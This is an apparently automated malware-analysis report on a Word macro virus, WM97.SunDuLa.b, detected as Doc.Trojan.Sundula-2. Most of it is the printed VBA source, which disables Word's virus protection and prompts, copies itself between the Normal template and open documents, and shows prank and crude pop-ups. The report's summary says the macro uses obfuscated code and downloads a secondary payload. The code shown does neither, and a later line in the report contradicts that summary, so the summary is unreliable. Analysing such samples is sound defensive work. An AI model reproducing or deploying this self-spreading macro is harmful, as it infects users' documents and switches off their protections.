Verdict: MALICIOUS
Risk Score: 140

Malware Insights

The sample is identified as Doc.Trojan.Sundula-2 by ClamAV, indicating a known malicious document. It contains VBA macros that attempt to disable security features and execute obfuscated code. The macro's intent appears to be to download and execute a secondary payload, as suggested by the disabling of virus protection and the structure of the code.

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
Heuristics (2)
- ClamAV: Doc.Trojan.Sundula-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Sundula-2
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8827 bytes |

SHA-256: 584797f42789fc494c6461e6808a1f4486cb041854430b4800b67bccbfb35a34

Detection:
- ClamAV: Doc.Trojan.Sundula-2
- Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'WM97.SunDuLa.b
Private Sub Document_Close()
    On Error Resume Next
    With Options
        .VirusProtection = False
        .SaveNormalPrompt = False
        .ConfirmConversions = False
    End With
    With Application
        .ScreenUpdating = False
        .DisplayStatusBar = False
        .DisplayAlerts = False
    End With
    Set norm = NormalTemplate.VBProject.VBComponents(1).codemodule
    Set doc = ActiveDocument.VBProject.VBComponents(1).codemodule
    If norm.Lines(1, 1) <> "'WM97.SunDuLa.b" Then
        norm.DeleteLines 1, norm.CountOfLines
        norm.InsertLines 1, doc.Lines(1, doc.CountOfLines)
        norm.replaceline 71, "Sub ViewVBcode()"
    ElseIf doc.Lines(1, 1) <> "'WM97.SunDuLa.b" Then
        doc.DeleteLines 1, doc.CountOfLines
        doc.InsertLines 1, norm.Lines(1, norm.CountOfLines)
        doc.replaceline 71, "Sub Toolsmacro()"
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    End If
    Randomize
    If Int(Rnd * 12) = 2 Then
        Application.EnableCancelKey = wdCancelDisabled
        ShowVisualBasicEditor = False
        Dim RandomNumber As Integer
        RandomNumber = Int((Val(14) * Rnd) + 1)
        Select Case RandomNumber
            Case 1
                MsgBox "Squirrels have fluffy tails!!", vbInformation, "Did you know?"
            Case 2
                MsgBox "Baboons have red butts!!", vbInformation, "Did you know?"
            Case 3
                MsgBox "Cows sleep standing up!!", vbInformation, "Did you know?"
            Case 4
                MsgBox "The average penis is 6 inchs long!!", vbInformation, "Did you know?"
            Case 5
                MsgBox "The average vagina is 9 inchs deep!!", vbInformation, "Did you know?"
            Case 6
                MsgBox "Flying squirrels don't fly they glide!!", vbInformation, "Did you know?"
            Case 7
                MsgBox "Life sucks!!", vbInformation, "Did you know?"
            Case 8
                MsgBox "Vampires are not real!!", vbInformation, "Did you know?"
            Case 9
                MsgBox "Werewolfs are not real!!", vbInformation, "Did you know?"
            Case 10
                MsgBox "The most dangerous wild animal is a deer!!", vbInformation, "Did you know"
            Case 11
                MsgBox "The platypus is the only mammal that lays eggs!!", vbInformation, "Did you know?"
            Case 12
                MsgBox "Flys live for about two days!!", vbInformation, "Did you know?"
            Case 13
                MsgBox "Turtles have shells!!", vbInformation, "Did you know?"
            Case 14
                MsgBox "Fish live in water!!", vbInformation, "Did you know?"
            Case 15
                MsgBox "You are infected with WM97.SunDuLa By Psyclone X [PE]!!", vbInformation, "Did you know?"
        End Select
    End If
End Sub
Sub Toolsmacro()
End Sub
```